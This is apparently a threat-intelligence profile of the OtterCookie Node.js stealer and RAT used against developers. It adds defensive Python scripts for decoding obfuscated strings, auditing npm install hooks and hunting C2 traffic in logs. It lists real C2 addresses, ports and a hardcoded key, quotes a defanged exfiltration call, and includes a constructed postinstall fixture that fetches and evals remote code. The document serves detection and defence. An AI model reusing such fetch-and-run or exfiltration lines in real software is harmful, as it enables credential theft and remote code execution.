OtterCookie
OtterCookie is a JavaScript/Node.js malware family used in DPRK-linked operations that target software developers, tracked under campaign names including Contagious Interview and DeceptiveDevelopment and associated with the wider Lazarus ecosystem; some reporting also notes overlap with the HexagonalRodent/Famous Chollima clusters. Multiple sources describe it as a distinct Node.js RAT rather than a BeaverTail variant, although other reporting characterizes it as a BeaverTail-like stealer or as an evolution used by some DeceptiveDevelopment teams. It is commonly deployed alongside BeaverTail and InvisibleFerret in phased intrusion chains aimed at developers, especially those working on Web3, cryptocurrency and DeFi projects, and is delivered via fake job offers, trojanized coding assessments, malicious npm packages, trojanized open-source projects, and at least one compromised VSCode extension (fast-draft).
Observed capabilities include continuous collection from an active developer workstation: clipboard contents, keystrokes, screenshots, browser secrets, wallet artifacts and developer credentials, plus reverse-shell and remote-access functionality. Reporting also describes browser credential theft, recursive file exfiltration of wallet and credential material, and active workspace monitoring on a 30-second interval. Command and control has been observed over Socket.IO on Engine.IO v4, with the server maintaining a live roster of connected victims and broadcasting victim state periodically. Infrastructure named in reporting includes 195.201.104.53, where port 6931 operated as a live OtterCookie Socket.IO C2 broadcasting victim state every 30 seconds and port 6101 appeared to be a predecessor or reserve C2, and 216.126.225.243, described as a known DPRK OtterCookie C2. In one analyzed Node.js stealer sample tied to OtterCookie infrastructure, browser theft was sent to port 8085, file uploads to port 8086, and host registration, C2 and reverse-shell traffic to port 8087; the sample beaconed to /api/notify and /upload and carried its HMAC-SHA256 key in plaintext ("SuperStr0ngSecret@)@^").
Reported targeting is concentrated on developers globally, particularly those working on cryptocurrency, Web3 and DeFi projects. Associated campaigns use LinkedIn recruiter lures, fake companies, bogus interviews, ClickFix-style prompts, and malicious coding challenges. OtterCookie is repeatedly linked to DPRK-attributed operations and Lazarus-related clusters, and reporting places it within a broader malware ecosystem shared across multiple North Korean-linked teams.
Groups observed using it
9 distinct threat actors attributed by public researchers.
At the end of 2024, a BeaverTail-like stealer named OtterCookie appeared, believed to be an evolution used by some DeceptiveDevelopment teams.
lazarusholic (lazarusholic.bsky.social): "Hunting Lazarus Part IX: The Google Mirror", published by RedAsgard. #BeaverTail #OtterCookie #DPRK #CTI
The campaign targeted Web3 and decentralised finance (DeFi) developers globally via AI-generated fake job offers delivered through LinkedIn, using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment and culminates in full credential exfiltration and wallet drainage.
Figure 3. Example of emoji use in Coral Sleet AI-assisted payload snippet for the OtterCookie malware
The attacker-owned GitHub repositories often contain simple, obfuscated code for downloading BeaverTail or OtterCookie malware.
In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware.
The latest malicious npm packages deliver a variant of the OtterCookie malware, which combines BeaverTail malware and prior versions of OtterCookie, according to Socket. BeaverTail is malware that often serves as a downloader of further payloads, while OtterCookie is a multistage infostealer and RAT.
Select infection chains have also been found to serve another malware codenamed OtterCookie via the same JavaScript payload used to launch BeaverTail.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
OtterCookie was not only a tool for victims who had been personally walked through a fake interview. It also sat behind package infrastructure... document an OtterCookie-attributed wave of malicious npm packages staged behind Vercel-hosted payload delivery.
using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment
The interview lure was hand-tailored. The npm pipe was industrial. Both fed the same RAT.
Execution
3 techniques
Finally, the third module implements a WebSocket connection to the C2 server (port 8087) with reverse-shell capabilities.
It is a JavaScript implant. It targets macOS. It uses Socket.IO as its command-and-control protocol...
using three interoperating malware families BeaverTail, OtterCookie, and InvisibleFerret in a phased infection chain that begins with a malicious coding assessment
Persistence
2 techniques
Five trojanized browser extensions – Bitwarden, Phantom, TronLink, Trust Wallet, and a Brave/MetaMask-themed trojan – share a single boot sequence.
Privilege Escalation
1 technique
Stealth
1 technique
The obfuscation technique looks typical to the code produced by obfuscation.io... We are facing a very long array of small Base64-encoded strings... only the “wrapper” that is responsible for the execution is obfuscated but the malicious payloads are embedded in plain text.
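The string-array pattern described in the quote above (a long array of short Base64 literals, with only the execution wrapper obfuscated) is the first thing an analyst unwinds. The following is an added example, not code from the original page or from any of the cited reports: it pulls obfuscator.io-style string arrays out of a JavaScript sample, decodes the Base64 entries it can, and scans both the decoded strings and the raw file text for URLs, IP:port pairs and loader keywords, so plaintext payloads embedded outside the array are covered too. The sample JavaScript is constructed for the demonstration; its URL uses the 203.0.113.0/24 documentation range, not a real C2, and the keyword list is an analyst's starting point, not a complete signature.

```python
import base64
import binascii
import re

# Constructed sample in the style of an obfuscator.io string array: short
# Base64 literals referenced by index from an obfuscated wrapper. The URL is
# in the TEST-NET-3 documentation range (203.0.113.0/24), not a real C2.
SAMPLE_JS = r"""
var _0x4d2a = ['YXhpb3M=', 'cG9zdA==', 'aHR0cDovLzIwMy4wLjExMy4xMDo4MDg3L2FwaS9ub3RpZnk=',
               'cmVxdWlyZQ==', 'Y2hpbGRfcHJvY2Vzcw==', 'not-b64!'];
(function (_0x1f, _0x2e) { /* rotation wrapper elided */ })(_0x4d2a, 0x1c3);
"""

STRING_ARRAY = re.compile(r"var\s+(_0x[0-9a-f]+)\s*=\s*\[(.*?)\];", re.S)
LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL = re.compile(r"https?://[^\s'\"]+")
IPPORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}\b")
# Loader/stealer vocabulary worth surfacing; extend per sample
INTERESTING = ("child_process", "axios", "socket.io", "/api/notify", "/upload", "exec")


def extract_arrays(js):
    """Yield (array_name, [literal, ...]) for each `var _0x.. = [...]` array."""
    for m in STRING_ARRAY.finditer(js):
        yield m.group(1), LITERAL.findall(m.group(2))


def try_b64(s):
    """Decode s as Base64 text, or return None if it is not valid Base64/UTF-8."""
    if not B64.match(s) or len(s) % 4:
        return None
    try:
        raw = base64.b64decode(s, validate=True)
    except binascii.Error:
        return None
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return None


def decode_strings(js):
    """Map array name -> list of (literal, decoded-or-None) pairs."""
    return {name: [(lit, try_b64(lit)) for lit in lits]
            for name, lits in extract_arrays(js)}


def indicators(js):
    """Collect URLs, IP:port pairs and keywords from raw text plus decoded strings."""
    texts = [js]
    for pairs in decode_strings(js).values():
        texts += [plain for _, plain in pairs if plain is not None]
    found = {"urls": [], "ip_ports": [], "keywords": []}
    for text in texts:
        for u in URL.findall(text):
            if u not in found["urls"]:
                found["urls"].append(u)
        for ip in IPPORT.findall(text):
            if ip not in found["ip_ports"]:
                found["ip_ports"].append(ip)
        for k in INTERESTING:
            if k in text and k not in found["keywords"]:
                found["keywords"].append(k)
    return found


if __name__ == "__main__":
    for name, pairs in decode_strings(SAMPLE_JS).items():
        for lit, plain in pairs:
            print(f"{name}: {lit!r} -> {plain!r}")
    print(indicators(SAMPLE_JS))
```

Run it against a deobfuscated-enough copy of the sample (after any string-array rotation has been undone, which this helper does not attempt); entries that fail to decode are reported as None rather than dropped, so a rotated or RC4-layered array is visible as a row of failures rather than silently empty.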
Credential Access
7 techniques
OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
Collection class | Behavior
Keystrokes | System-wide key capture across analyzed samples, not limited to browser input.
Developer secrets | .env files, SSH material, cloud credentials, source-control tokens, and adjacent on-disk secrets.
Browser data | Credential and cookie theft consistent with the broader Contagious Interview campaign.
The first one is a browser credential stealer. It supports: Chrome, Brave, Edge, Opera, Opera GX, Vivaldi, Kiwi, Yandex, Iridium, Comodo Dragon, SRWare Iron, Chromium, AVG Browser.
The second one is a recursive file exfiltration scanner. It scans the victim’s filesystem and searches for sensitive files by name/extension... '.pem', '.p12', '.pfx', '.jks', '.keys', '.cer', '.crt', '.cert', '.der'
Discovery
3 techniques
The attack culminates with the deployment of a RAT that can gather system information, enumerate files and directories, list running processes.
Collection
5 techniques
BeaverTail is an infostealer and downloader that collects data from cryptocurrency wallets, keychains, and saved browser logins.
OtterCookie was reading clipboard contents, capturing keystrokes, taking screenshots, watching the active workspace on a thirty-second clock.
Collection class | Behavior
Keystrokes | System-wide key capture across analyzed samples, not limited to browser input.
Command and Control
5 techniques
Finally, the third module implements a WebSocket connection to the C2 server (port 8087) with reverse-shell capabilities.
All HTTP communications are performed via the Axios NPM package... const response = await axios.post(`hxxp://216[.]126[.]225[.]243:8086/upload`, form... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify
...leverage legitimate hosting services like Vercel.App as command and control servers.
Each extension reads it from a transaction payload on an Aptos mainnet account ... at runtime. ... The first thing each of the five extensions does on load is ask a public blockchain where its server is.
Indicator: npm postinstall hooks fetching payloads from Vercel-hosted staging domains. Hunt: inspect package install logs and package-lock graphs.
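Both the Initial Access evidence above (an OtterCookie-attributed wave of npm packages staged behind Vercel-hosted payload delivery) and the hunt note just above (inspect install logs and package-lock graphs for postinstall hooks) reduce to one check: which installed packages run a lifecycle script that fetches and executes remote code. The following is an added example, not code from the original page or from Socket's or any other vendor's tooling. The manifests are constructed for the demonstration, and the pattern list (curl/wget, node -e, eval, fetch() of a remote URL, *.vercel.app hosts, sh -c) is an analyst's starting list, not a complete detection; a hit is a triage lead, since legitimate packages also use prepare and postinstall.

```python
import json
import re
from pathlib import Path

# Lifecycle scripts npm runs on its own during `npm install`
AUTO_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Traits of dropper-style install scripts: fetch something remote and run it.
# vercel.app is the hosting service the reporting above names for staging.
SUSPICIOUS = [
    (re.compile(r"\b(?:curl|wget)\b"), "remote download tool"),
    (re.compile(r"\bnode\s+(?:-e|--eval)\b"), "inline node -e"),
    (re.compile(r"\beval\b|\bnew\s+Function\b"), "eval of dynamic code"),
    (re.compile(r"https?://[^\s'\"]*\.vercel\.app", re.I), "vercel.app staging URL"),
    (re.compile(r"\bfetch\s*\(\s*['\"]https?://"), "fetch() of a remote URL"),
    (re.compile(r"\b(?:bash|sh)\s+-c\b"), "shell -c one-liner"),
]

# Constructed package.json contents for the demonstration (not real packages).
SAMPLE_MANIFESTS = {
    "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "jest"}},
    "ts-builder": {"name": "ts-builder", "scripts": {"prepare": "tsc -p ."}},
    "totally-fine-utils": {
        "name": "totally-fine-utils",
        "scripts": {
            "postinstall": "node -e \"fetch('https://stage-example.vercel.app/p.js').then(r=>r.text()).then(eval)\"",
        },
    },
}


def audit_manifest(name, manifest):
    """Return a finding dict per (auto-run hook, matched pattern) in one manifest."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in AUTO_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd:
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append({"package": name, "hook": hook,
                                 "reason": reason, "command": cmd})
    return findings


def audit_manifests(manifests):
    """Audit a {name: manifest_dict} mapping, e.g. parsed from a lockfile graph."""
    findings = []
    for name, manifest in manifests.items():
        findings += audit_manifest(name, manifest)
    return findings


def audit_tree(root):
    """Walk a checkout or node_modules tree and audit every package.json in it."""
    findings = []
    for pj in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(pj.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON; skip rather than abort the sweep
        findings += audit_manifest(manifest.get("name") or pj.parent.name, manifest)
    return findings


if __name__ == "__main__":
    for f in audit_manifests(SAMPLE_MANIFESTS):
        print(f"{f['package']} [{f['hook']}] {f['reason']}: {f['command']}")
```

The safe order of operations is to install with lifecycle scripts disabled (`npm ci --ignore-scripts` or `npm config set ignore-scripts true`), run `audit_tree("node_modules")`, and only then decide which packages' scripts to run by hand; doing it after a normal install only tells you what has already executed.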
Exfiltration
1 technique
Data is exfiltrated to port 8085... Interesting files are exfiltrated via port 8086... Upon the first connection the following info is sent to the C2 via a POST request to hxxp://216[.]126[.]225[.]243:8087/api/notify... All communications (on different ports) are made with the IP address 216.126.225.243.
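The summary, the Command and Control section and the Exfiltration section above give concrete network observables: fixed C2 addresses, POSTs to /api/notify and /upload on ports 8085 to 8087, and a Socket.IO channel whose default client handshake is an HTTP long-poll request carrying EIO=4 (Engine.IO v4). The following is an added example, not code from the original page or from any cited report, that turns those into a small triage pass over proxy-style HTTP logs. The log lines and their field layout are constructed for the demonstration; the Engine.IO rule assumes the proxy records the handshake URI, and it deliberately ignores private destinations because internal dev servers use Socket.IO legitimately.

```python
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed proxy-style HTTP log lines (not real telemetry). Field layout:
# client_ip server_ip server_port method request_uri
SAMPLE_LOG = """\
10.0.0.5 216.126.225.243 8087 POST /api/notify
10.0.0.5 216.126.225.243 8086 POST /upload
10.0.0.5 195.201.104.53 6931 GET /socket.io/?EIO=4&transport=polling&t=OabCdEf
10.0.0.5 142.250.74.46 443 GET /search?q=node
10.0.0.7 10.0.0.9 3000 GET /socket.io/?EIO=4&transport=polling&t=OabCdEg
"""

# Infrastructure and endpoints named in the reporting on this page
KNOWN_C2_IPS = {"216.126.225.243", "195.201.104.53"}
KNOWN_C2_PORTS = {6101, 6931, 8085, 8086, 8087}
KNOWN_C2_PATHS = {"/api/notify", "/upload"}
# Default Socket.IO client handshake: HTTP long-polling with EIO=4 (Engine.IO v4)
ENGINEIO_V4 = re.compile(r"/socket\.io/\?[^ ]*\bEIO=4\b")


@dataclass
class Hit:
    client: str
    server: str
    port: int
    reasons: list = field(default_factory=list)


def classify(line):
    """Return the reasons one log line looks like OtterCookie C2 (empty if none)."""
    client, server, port, method, uri = line.split(maxsplit=4)
    port = int(port)
    path = uri.split("?", 1)[0]
    reasons = []
    if server in KNOWN_C2_IPS:
        reasons.append("known OtterCookie C2 address")
    if method == "POST" and path in KNOWN_C2_PATHS and port in KNOWN_C2_PORTS:
        reasons.append(f"POST {path} on C2 port {port}")
    # Behavioural rule: Socket.IO to a public host on a non-web port. Private
    # destinations are skipped so in-house dev servers do not flood the queue.
    if (ENGINEIO_V4.search(uri) and port not in (80, 443)
            and not ipaddress.ip_address(server).is_private):
        reasons.append(f"Engine.IO v4 handshake to public host on port {port}")
    return reasons


def hunt(log_text):
    """Run classify() over every non-empty line and return the hits in order."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        reasons = classify(line)
        if reasons:
            client, server, port = line.split()[:3]
            hits.append(Hit(client, server, int(port), reasons))
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"{h.client} -> {h.server}:{h.port}: {'; '.join(h.reasons)}")
```

The address and path rules are brittle by design (they expire with the infrastructure), so treat the Engine.IO rule as the one to keep: a developer host opening a Socket.IO session to a public IP on a high port, repeating on a fixed cadence, is the behaviour the reporting describes, and the 30-second broadcast interval gives you the period to look for in the same log.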
IOCs tracked for this family
92 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
84 sources tracked across advisories, community write-ups, and news.
A cross-platform Node.js malware targeting Windows (via WSL), macOS, and Linux. It includes three main payloads: a browser credential stealer, a recursive file exfiltration module for sensitive files and crypto-wallet data, and a WebSocket-based backdoor with reverse-shell capabilities. Data is exfiltrated to a C2 over ports 8085, 8086, and 8087.
Referenced as a cross-platform NPM stealer.
Node.js implant used to monitor the live workstation, including clipboard contents, keystrokes, screenshots, and active workspace activity.